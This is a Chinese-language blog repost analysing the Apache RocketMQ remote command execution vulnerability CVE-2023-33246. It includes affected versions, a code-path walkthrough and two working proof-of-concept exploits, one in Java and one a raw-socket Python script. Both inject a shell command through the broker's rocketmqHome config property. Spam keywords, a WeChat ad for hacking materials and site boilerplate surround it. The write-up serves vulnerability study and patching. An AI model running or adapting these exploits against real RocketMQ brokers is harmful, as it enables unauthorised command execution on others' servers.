国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Apache RocketMQ 遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2023-33246)

這篇具有很好參考價(jià)值的文章主要介紹了Apache RocketMQ 遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2023-33246)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

漏洞簡(jiǎn)介

RocketMQ 5.1.0及以下版本,在一定條件下,存在遠(yuǎn)程命令執(zhí)行風(fēng)險(xiǎn)。RocketMQ的NameServer、Broker、Controller等多個(gè)組件外網(wǎng)泄露,缺乏權(quán)限驗(yàn)證,攻擊者可以利用該漏洞利用更新配置功能以RocketMQ運(yùn)行的系統(tǒng)用戶身份執(zhí)行命令。 此外,攻擊者可以通過偽造 RocketMQ 協(xié)議內(nèi)容來達(dá)到同樣的效果。

影響版本

5.0.0 <= Apache RocketMQ < 5.1.1

4.0.0 <= Apache RocketMQ < 4.9.6

安全版本

Apache RocketMQ 5.1.1

Apache RocketMQ 4.9.6

漏洞復(fù)現(xiàn)

在本地創(chuàng)建 maven 項(xiàng)目 并添加依賴

<dependencies> ? 
 <!-- https://mvnrepository.com/artifact/org.apache.rocketmq/rocketmq-tools -->
 ? ? ? ?<dependency>
 ? ? ? ? ? ?<groupId>org.apache.rocketmq</groupId>
 ? ? ? ? ? ?<artifactId>rocketmq-tools</artifactId>
 ? ? ? ? ? ?<version>5.1.0</version>
 ? ? ? ?</dependency>
</dependencies>

編寫漏洞利用代碼

import org.apache.rocketmq.tools.admin.DefaultMQAdminExt;
?
import java.util.Properties;
?
public class poc1 {
 ? ?public static void main(String[] args) throws Exception {
 ? ? ? ?// 創(chuàng)建 Properties 對(duì)象
 ? ? ? ?Properties props = new Properties();
 ? ? ? ?//修改rocketmqHome配置
 ? ? ? ?props.setProperty("rocketmqHome","-c gnome-calculator test");
 ? ? ? ?props.setProperty("filterServerNums","1");
 ? ? ? ?// 創(chuàng)建 DefaultMQAdminExt 對(duì)象并啟動(dòng)
 ? ? ? ?DefaultMQAdminExt admin = new DefaultMQAdminExt();
 ? ? ? ?//此處為 namesrv 端口,此端口無需可訪問
 ? ? ? ?admin.setNamesrvAddr("192.168.222.130:9876");
 ? ? ? ?admin.start();
 ? ? ? ?// 更新配置?件
 ? ? ? ?//此處為 broker 端口,必須可訪問
 ? ? ? ?admin.updateBrokerConfig("192.168.222.130:10911", props);
 ? ? ? ?// 關(guān)閉 DefaultMQAdminExt 對(duì)象
 ? ? ? ?admin.shutdown();
 ?  }
}

漏洞分析

?

?

?

?

我們看到真正有危險(xiǎn)的操作應(yīng)該是與 10911 進(jìn)行通信的操作,沒有進(jìn)行身份驗(yàn)證和加密傳輸,同時(shí)帶入了命令執(zhí)行的參數(shù)

org/apache/rocketmq/remoting/protocol/RequestCode.java? code 代表調(diào)用不同的功能

org/apache/rocketmq/broker/processor/AdminBrokerProcessor.java#processRequest?

??org/apache/rocketmq/broker/processor/AdminBrokerProcessor.java#updateBrokerConfig?

??org/apache/rocketmq/remoting/Configuration.java#update?

?

如果屬性名是其內(nèi)置的,就進(jìn)行更新操作

【----幫助網(wǎng)安學(xué)習(xí),以下所有學(xué)習(xí)資料免費(fèi)領(lǐng)!加vx:yj009991,備注 “博客園” 獲??!】

 ① 網(wǎng)安學(xué)習(xí)成長(zhǎng)路徑思維導(dǎo)圖
?、?60+網(wǎng)安經(jīng)典常用工具包
 ③ 100+SRC漏洞分析報(bào)告
?、?150+網(wǎng)安攻防實(shí)戰(zhàn)技術(shù)電子書
?、?最權(quán)威CISSP 認(rèn)證考試指南+題庫
 ⑥ 超1800頁CTF實(shí)戰(zhàn)技巧手冊(cè)
?、?最新網(wǎng)安大廠面試題合集(含答案)
?、?APP客戶端安全檢測(cè)指南(安卓+IOS)

后面的一部分就比較清晰了

org/apache/rocketmq/broker/BrokerStartup.java#start?

??org/apache/rocketmq/broker/BrokerController.java#start?

??org/apache/rocketmq/broker/BrokerController.java#startBasicService?

??org/apache/rocketmq/broker/filtersrv/FilterServerManager.java#start?

根據(jù)從 Wireshark 中抓取的數(shù)據(jù)包 我們也可以構(gòu)造這樣的 payload 觸發(fā)漏洞

import socket
import binascii
client = socket.socket()
?
# you ip
client.connect(('192.168.222.130',10911))
?
# data
json='{"code":25,"flag":0,"language":"JAVA","opaque":0,"serializeTypeCurrentRPC":"JSON","version":433}'.encode('utf-8')
body='filterServerNums=1\nrocketmqHome=-c gnome-calculator test'.encode('utf-8')
json_lens = int(len(binascii.hexlify(json).decode('utf-8'))/2) ? ? ? ? ? ? ? # 一個(gè)字節(jié)是2個(gè)十六進(jìn)制數(shù)
head1 = '00000000'+str(hex(json_lens))[2:] ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? # hex(xxxx) 0x1243434 去掉 0x
all_lens = int(4+len(binascii.hexlify(body).decode('utf-8'))/2+json_lens) ? ?# 總長(zhǎng)度要 加上 head1[-8:] 的值
head2 = '00000000'+str(hex(all_lens))[2:]
data = head2[-8:]+head1[-8:]+binascii.hexlify(json).decode('utf-8')+binascii.hexlify(body).decode('utf-8') # 協(xié)議總長(zhǎng)度+json長(zhǎng)度+json+body
?
# send
client.send(bytes.fromhex(data))
data_recv = client.recv(1024)
print(data_recv)

?

漏洞修復(fù)

移除了命令執(zhí)行的模塊?

? ? 更多網(wǎng)安技能的在線實(shí)操練習(xí),請(qǐng)點(diǎn)擊這里>>

?文章來源地址http://www.zghlxwxcb.cn/news/detail-621281.html

到了這里,關(guān)于Apache RocketMQ 遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2023-33246)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 復(fù)現(xiàn)CVE-2021-44228-Apache Log4j2遠(yuǎn)程代碼執(zhí)行漏洞

    復(fù)現(xiàn)CVE-2021-44228-Apache Log4j2遠(yuǎn)程代碼執(zhí)行漏洞

    復(fù)現(xiàn)CVE-2021-44228-Apache Log4j2遠(yuǎn)程代碼執(zhí)行漏洞 目錄 前言 漏洞原理 影響范圍 環(huán)境搭建漏洞復(fù)現(xiàn) 使用工具JNDIExploit-1.2-SNAPSHOT.jar 近期Apache Log4j2被暴露了一個(gè)嚴(yán)重的遠(yuǎn)程代碼執(zhí)行安全漏洞(CVE-2021-44228),有嚴(yán)重的安全風(fēng)險(xiǎn)。Apache Log4j2是一款優(yōu)秀的Java日志框架, 被廣泛地應(yīng)用在

    2024年02月05日
    瀏覽(28)
  • CVE-2023-33246命令執(zhí)行復(fù)現(xiàn)分析

    RocketMQ是一款低延遲、高并發(fā)、高可用、高可靠的分布式消息中間件。既可為分布式應(yīng)用系統(tǒng)提供異步解耦和削峰填谷的能力,同時(shí)也具備互聯(lián)網(wǎng)應(yīng)用所需的海量消息堆積、高吞吐、可靠重試等特性。 影響版本 = RocketMQ 5.1.0 = RocketMQ 4.9.5 環(huán)境搭建 創(chuàng)建broker.conf,并且修改配置

    2024年02月09日
    瀏覽(25)
  • 【Citrix篇】1-Citrix ADC/Gateway 遠(yuǎn)程代碼執(zhí)行漏洞CVE-2023-3519和升級(jí)方法

    【Citrix篇】1-Citrix ADC/Gateway 遠(yuǎn)程代碼執(zhí)行漏洞CVE-2023-3519和升級(jí)方法

    目錄 一、前言 二、實(shí)驗(yàn)效果 三、影響的版本(CVE-2023-3519) 四、升級(jí)前準(zhǔn)備 五、命令行升級(jí)步驟 六、GUi界面升級(jí)步驟 七、公司介紹 近期我們收到Citrix發(fā)布關(guān)于NetScaler ADC 、NetScaler Gateway的風(fēng)險(xiǎn)通告,漏洞編號(hào)為CVE-2023-3519, 漏洞等級(jí):嚴(yán)重,漏洞評(píng)分:9.8 漏洞影響 :Hack可

    2024年02月08日
    瀏覽(20)
  • Apache Druid中Kafka配置遠(yuǎn)程代碼執(zhí)行漏洞(MPS-2023-6623)

    Apache Druid中Kafka配置遠(yuǎn)程代碼執(zhí)行漏洞(MPS-2023-6623)

    Apache Druid 是一個(gè)高性能的數(shù)據(jù)分析引擎。 Kafka Connect模塊曾出現(xiàn)JNDI注入漏洞(CVE-2023-25194),近期安全研究人員發(fā)現(xiàn)Apache Druid由于支持從 Kafka 加載數(shù)據(jù)的實(shí)現(xiàn)滿足其利用條件,攻擊者可通過修改 Kafka 連接配置屬性進(jìn)行 JNDI 注入攻擊,進(jìn)而在服務(wù)端執(zhí)行任意惡意代碼。 Apache Dru

    2024年02月07日
    瀏覽(26)
  • 03Apache Solr 遠(yuǎn)程命令執(zhí)行漏洞(CVE-2019-0193)

    0x01 漏洞介紹 Apache Solr 是一個(gè)開源的搜索服務(wù)器。Solr 使用 Java 語言開發(fā),主要基于 HTTP 和 Apache Lucene 實(shí)現(xiàn)。 此次漏洞出現(xiàn)在 Apache Solr 的 DataImportHandler ,該模塊是一個(gè)可選但常用的模塊,用于從數(shù)據(jù)庫和其他源中提取數(shù)據(jù)。它具有一個(gè)功能,其中所有的 DIH配置都可以通過外

    2024年02月09日
    瀏覽(18)
  • CVE-2021-44228 Apache log4j 遠(yuǎn)程命令執(zhí)行漏洞

    CVE-2021-44228 Apache log4j 遠(yuǎn)程命令執(zhí)行漏洞

    一、漏洞原理 log4j(log for java)是由Java編寫的可靠、靈活的日志框架,是Apache旗下的一個(gè)開源項(xiàng)目,使用Log4j,我們更加方便的記錄了日志信息,它不但能控制日志輸出的目的地,也能控制日志輸出的內(nèi)容格式;通過定義不同的日志級(jí)別,可以更加精確的控制日志的生成過程,

    2024年02月08日
    瀏覽(33)
  • Windows Server 2012 R2服務(wù)器Microsoft 消息隊(duì)列遠(yuǎn)程代碼執(zhí)行漏洞CVE-2023-21554補(bǔ)丁KB5025288的安裝及問題解決

    Windows Server 2012 R2服務(wù)器Microsoft 消息隊(duì)列遠(yuǎn)程代碼執(zhí)行漏洞CVE-2023-21554補(bǔ)丁KB5025288的安裝及問題解決

    近日,系統(tǒng)安全掃描中發(fā)現(xiàn)Windows Server 2012 R2服務(wù)器存在Microsoft 消息隊(duì)列遠(yuǎn)程代碼執(zhí)行漏洞。本文記錄補(bǔ)丁安裝中遇到的“此更新不適用于你的計(jì)算機(jī)”問題及解決辦法。 一、問題描述: 1、系統(tǒng)安全掃描中發(fā)現(xiàn)Windows Server 2012 R2服務(wù)器存在Microsoft 消息隊(duì)列遠(yuǎn)程代碼執(zhí)行漏洞,

    2024年02月10日
    瀏覽(25)
  • Apache Struts2 S2-045遠(yuǎn)程命令執(zhí)行漏洞(CVE-2017-5638)復(fù)現(xiàn)

    Apache Struts2 S2-045遠(yuǎn)程命令執(zhí)行漏洞(CVE-2017-5638)復(fù)現(xiàn)

    Apache Struts2是Apache項(xiàng)目下的一個(gè)web 框架,幫助Java開發(fā)者利用J2EE來開發(fā)Web相關(guān)應(yīng)用。 Apache Struts2的Jakarta Multipart parser插件存在遠(yuǎn)程代碼執(zhí)行漏洞,攻擊者可以在使用該插件上傳文件時(shí),修改HTTP請(qǐng)求頭中的Content-Type值來觸發(fā)該漏洞,導(dǎo)致遠(yuǎn)程執(zhí)行代碼。 Struts 2.3.5 – Struts 2.3.3

    2024年02月15日
    瀏覽(31)
  • 漏洞復(fù)現(xiàn)-Drupal遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2018-7602)

    漏洞復(fù)現(xiàn)-Drupal遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2018-7602)

    Drupal 7.x 和 8.x 的多個(gè)子系統(tǒng)中存在一個(gè)遠(yuǎn)程執(zhí)行代碼漏洞。這可能允許攻擊者利用 Drupal 站點(diǎn)上的多個(gè)攻擊媒介,從而導(dǎo)致該站點(diǎn)受到威脅。此漏洞與 Drupal 核心 - 高度關(guān)鍵 - 遠(yuǎn)程代碼執(zhí)行 - SA-CORE-2018-002 有關(guān)。SA-CORE-2018-002 和此漏洞都在野外被利用。 -c 后面接命令,緊隨賬號(hào)

    2024年02月16日
    瀏覽(23)
  • Office遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2017-11882)漏洞復(fù)現(xiàn)

    Office遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2017-11882)漏洞復(fù)現(xiàn)

    CVE-2017-11882允許攻擊者在當(dāng)前用戶的上下文中運(yùn)行任意代碼,導(dǎo)致無法正確處理內(nèi)存中的對(duì)象,即為“ Microsoft Office Memory Corruption Vulnerability “,棧溢出的遠(yuǎn)程執(zhí)行漏洞 該漏洞是在 EQNEDT32.EXE 組件的緩沖區(qū)溢出導(dǎo)致。當(dāng)受害用戶打開Office文檔時(shí)就有可能被漏洞利用,危害極大。

    2024年02月12日
    瀏覽(24)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包